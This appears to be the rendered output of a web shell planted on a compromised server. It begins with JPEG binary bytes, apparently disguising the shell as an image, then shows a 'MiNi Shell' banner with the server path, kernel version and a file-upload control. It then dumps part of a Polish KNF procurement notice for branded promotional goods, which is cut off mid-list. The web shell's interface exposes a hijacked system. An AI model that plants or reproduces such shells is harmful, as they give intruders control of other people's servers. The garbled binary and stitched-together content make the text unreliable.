JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240312/0024176101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowanie i dostarczenie materiałów promocyjno-konferencyjnych<br/>z logo KNF, UKNF oraz CEDUR </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd Komisji Nadzoru Finansowego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 382088467</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piękna 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-549</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@knf.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.knf.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowanie i dostarczenie materiałów promocyjno-konferencyjnych<br/>z logo KNF, UKNF oraz CEDUR </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4af1d43a-cf11-11ee-a3b5-e25d731b0da9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00241761</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00104722/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.14 Przygotowanie i dostarczenie materiałów promocyjno-konferencyjnych z logo KNF oraz CEDUR</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4af1d43a-cf11-11ee-a3b5-e25d731b0da9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a<br/>Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza dostępnego na Platformy e-Zamówienia w zakładce »Komunikacja«<br/>oraz za pośrednictwem poczty elektronicznej: zamowienia@knf.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca przygotowuje ofertę na<br/>Formularza ofertowego udostępnionym przez Zamawiającego na Platformie e-Zamówienia.<br/>Zalogowany Wykonawca używając przycisku »Wypełnij« widocznego pod »Formularzem ofertowym«, jest zobowiązany do<br/>zweryfikowania poprawności danych automatycznie pobranych przez system z jego konta i uzupełnienia pozostałych informacji<br/>dotyczących wykonawcy /wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w formacie danych .doc, .docx lub .pdf i<br/>podpisana podpisem elektronicznym przez osobę/y upoważnioną/e do składania oświadczeń woli w imieniu Wykonawcy. Sposób<br/>złożenia Oferty, w tym zaszyfrowania Oferty opisany został w Regulaminie Platformy e-Zamówienia dostępnym oraz w „Instrukcji<br/>interaktywnej” pod adresem:<br/>https://media.ezamowienia.gov.pl/pod/2021/10/Oferty-5.2.pdf</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZA-DZAZZP.2610.68.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ I: <br/><br/>1)	50 szt. granatowych okładek na dokumenty A4 z wytłoczonym logo KNF, wraz z wizualizacją znakowania,<br/><br/>2)	500 szt. teczek konferencyjnych z logo KNF, szerokość grzbietu 15 mm (składanych z wykrojnika przygotowanego przez Wykonawcę ze skrzydełkami z 3 stron), wraz z wizualizacją znakowania,<br/><br/>3)	500 szt. teczek konferencyjnych z logo UKNF, szerokość grzbietu 15 mm (składanych <br/>z wykrojnika przygotowanego przez Wykonawcę ze skrzydełkami z 3 stron), wraz z wizualizacją znakowania,<br/><br/>4)	100 szt. toreb białych z logo KNF lub UKNF (kolor granatowy) z adresem www.knf.gov.pl na dole torby (kolor granatowy), rozmiar torby (mm): 220x80x240 wraz z wizualizacją znakowania,<br/><br/>5)	200 szt. toreb białych z logo KNF lub UKNF (kolor granatowy) z adresem www.knf.gov.pl na dole torby (kolor granatowy), rozmiar torby (mm): 240x100x350 wraz z wizualizacją znakowania,<br/><br/>6)	200 szt. toreb białych z logo KNF lub UKNF (kolor granatowy) z adresem www.knf.gov.pl na dole torby (kolor granatowy), rozmiar torby (mm): 350x80x230 wraz z wizualizacją znakowania,<br/><br/>7)	100 szt. toreb białych z logo KNF lub UKNF (kolor granatowy) z adresem www.knf.gov.pl na dole torby (kolor granatowy), rozmiar torby (mm): 400x100x300 wraz z wizualizacją znakowania,<br/><br/>8)	2 tys. szt. długopisów aluminiowych w kolorze granatowym metalicznym z logo KNF, wraz z wizualizacją znakowania, <br/> <br/>9)	2 tys. szt. długopisów aluminiowych w kolorze granatowym metalicznym z logo UKNF, wraz z wizualizacją znakowania,<br/><br/>10)	5 tys. szt. długopisów białych aluminiowych z logo KNF lub UKNF, z trwałym mocowaniem gumowej końcówki, wraz z wizualizacją znakowania, <br/> <br/>11)	5 tys. szt. ołówków automatycznych z logo KNF lub UKNF, zaostrzonych z gumką, z materiału drewnopodobnego, w kolorze białym (lakier), wraz z wizualizacją znakowania, <br/><br/>12)	4,5 tys. szt. ołówków automatycznych z logo KNF lub UKNF, zaostrzonych z gumką, z materiału drewnopodobnego, w kolorze niebieskim (lakier), wraz z wizualizacją znakowania, <br/><br/>13)	3 tys. szt. ołówków automatycznych z logo KNF lub UKNF, zaostrzonych z gumką, z materiału drewnopodobnego, w kolorze zielonym (lakier), wraz z wizualizacją znakowania, <br/><br/>14)	1 tys. szt. notesów konferencyjnych białych z logo KNF format A5, wraz z wizualizacją znakowania przodu notesu oraz kartki wewnętrznej,<br/><br/>15)	1 tys. szt. notesów konferencyjnych białych z logo UKNF format A5, wraz z wizualizacją znakowania przodu notesu oraz kartki wewnętrznej,<br/><br/>16)	1 tys. szt. notesów konferencyjnych białych z logo KNF format A4, wraz z wizualizacją znakowania przodu notesu oraz kartki wewnętrznej,<br/><br/>17)	1 tys. szt. notesów konferencyjnych białych z logo UKNF format A4, wraz z wizualizacją znakowania przodu notesu oraz kartki wewnętrznej,<br/><br/>18)	300 szt. notesów konferencyjnych z logo KNF format A4, okładka w kolorze granatowym, wraz z wizualizacją znakowania przodu notesu oraz kartki wewnętrznej,<br/><br/>19)	300 szt. notesów konferencyjnych z logo UKNF format A4, okładka w kolorze granatowym, wraz z wizualizacją znakowania przodu notesu oraz kartki wewnętrznej,<br/><br/>20)	300 szt. notesów tzw. memo stick (z możliwością naklejenia po krótszym boku), format: A6 (+/- 0,5 cm), 25 kartkowe, białe z granatowym logo UKNF, wraz z wizualizacją znakowania,<br/><br/>21)	300 szt. notesów skóropodobnych A5 z gumką zamykającą i na długopis z tłoczonym logo KNF lub UKNF na okładce, wraz z wizualizacją znakowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79971100-2 - Usługi introligatorskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II<br/>1)	500 szt. worków/plecaków płóciennych z nadrukiem (sitodruk) z logo kampanii GMW (full color) oraz logo CEDUR, wraz z wizualizacją znakowania<br/><br/>2)	700 szt. toreb płóciennych stebnowanych w kolorze naturalnym z nadrukiem (sitodruk) logo kampanii GMW (full color) oraz logo CEDUR, wraz z wizualizacją znakowania<br/><br/>3)	500 szt. worków/plecaków płóciennych z nadrukiem (sitodruk) logo KNF lub UKNF, wraz z wizualizacją znakowania<br/><br/>4)	500 szt. toreb płóciennych stebnowananych w kolorze granatowym (jak logo KNF/UKNF lub zbliżonym) z nadrukiem (sitodruk) logo KNF lub UKNF, wraz z wizualizacją znakowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79971100-2 - Usługi introligatorskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III<br/>1)	70 szt. plecaków na laptopy z logo KNF lub UKNF w kolorze białym, wraz z wizualizacją znakowania, <br/><br/>2)	25 szt. toreb na laptopy z logo KNF w kolorze białym, wraz z wizualizacją znakowania, <br/><br/>3)	50 szt. toreb na laptopy z logo UKNF w kolorze białym, wraz z wizualizacją znakowania,<br/> <br/>4)	100 szt. hubów USB w kolorze białym z logo KNF lub UKNF w kolorze granatowym, wraz z wizualizacją znakowania,<br/><br/>5)	100 szt. słuchawek bezprzewodowych białych z logo KNF lub UKNF w kolorze granatowym na stacji dokującej, wraz z wizualizacją znakowania,<br/><br/>6)	200 szt. aluminiowych głośników bezprzewodowych w kolorze granatowym z logo KNF lub UKNF w kolorze białym, wraz z wizualizacją znakowania,<br/><br/>7)	100 szt. bezprzewodowych wykrywaczy kluczy w kolorze białym z logo KNF lub UKNF w kolorze granatowym, wraz z wizualizacją znakowania,<br/><br/>8)	100 szt. pendriwów USB 3.0, 32 GB z grawerowanym logo KNF lub UKNF, wraz z wizualizacją znakowania,<br/><br/>9)	50 szt. powerbanków z opcją ładowania indukcyjnego w kolorze czarnym, granatowym lub białym z logo KNF lub UKNF w kolorze białym lub granatowym, wraz z wizualizacją znakowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79971100-2 - Usługi introligatorskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ IV<br/>1)	100 szt. parasoli automatycznych długich, wersja męska z logo KNF lub UKNF, zagięta rączka, wraz z wizualizacją nadruku oraz wykonaniem nadruku próbnego na jednym egzemplarzu parasola <br/>2)	100 szt. parasoli automatycznych, wersja damska składana „do torebki” z logo KNF lub UKNF, wraz z wizualizacją nadruku oraz wykonaniem nadruku próbnego na jednym egzemplarzu parasola<br/>3)	200 szt. bidonów na wodę z wkładem na lód/owoce z logo KNF lub UKNF w kolorze granatowym, wraz z wizualizacją znakowania<br/>4)	100 szt. termosów 0,5 l w kolorze srebrnym z termometrem, z wygrawerowanym logo KNF lub UKNF o pojemność 400-450 ml, wraz z wizualizacją znakowania<br/>5)	100 szt. kubów termicznych z wygrawerowanym logo KNF lub UKNF o pojemności 400 ml - 470 ml, wraz z wizualizacją znakowania<br/>6)	30 szt. saszetek zapinanych w pasie w kolorze granatowym z logo KNF lub UKNF w kolorze białym, wraz z wizualizacją znakowania </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79971100-2 - Usługi introligatorskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ V<br/><br/>1)	140 szt. koszulek T-shirt w kolorze granatowym (jak logo KNF/UKNF lub zbliżonym) lub białym, fason damski taliowany z białym logo lub granatowym, na lewej piersi: sygnet KNF lub UKNF lub logo KNF lub UKNF, znakowanie metodą sitodruku, wraz z wizualizacją znakowania<br/><br/>2)	180 szt. koszulek T-shirt w kolorze granatowym (jak logo KNF/UKNF lub zbliżonym) lub białym, fason męski z białym logo lub granatowym, na lewej piersi: sygnet KNF lub UKNF lub logo KNF lub UKNF, znakowanie metodą sitodruku, wraz z wizualizacją znakowania<br/><br/>3)	80 szt. koszulek Polo w kolorze granatowym (jak logo KNF/UKNF lub zbliżonym), fason męski z haftowanym białym logo KNF lub UKNF, znakowanie metodą haftowania, wraz z wizualizacją znakowania<br/><br/>4)	80 szt. koszulek Polo w kolorze granatowym (jak logo KNF/UKNF lub zbliżonym), fason damski z haftowanym białym logo KNF lub UKNF, znakowanie metodą haftowania, wraz z wizualizacją znakowania<br/><br/>5)	50 szt. bluz typu softshell w kolorze granatowym (jak logo KNF/UKNF lub zbliżonym), kaptur na zamek, z nadrukiem logo KNF lub UKNF w kolorze białym, fason: damski, wraz z wizualizacją znakowania<br/><br/>6)	50 szt. bluz typu softshell w kolorze granatowym (jak logo KNF/UKNF lub zbliżonym), kaptur 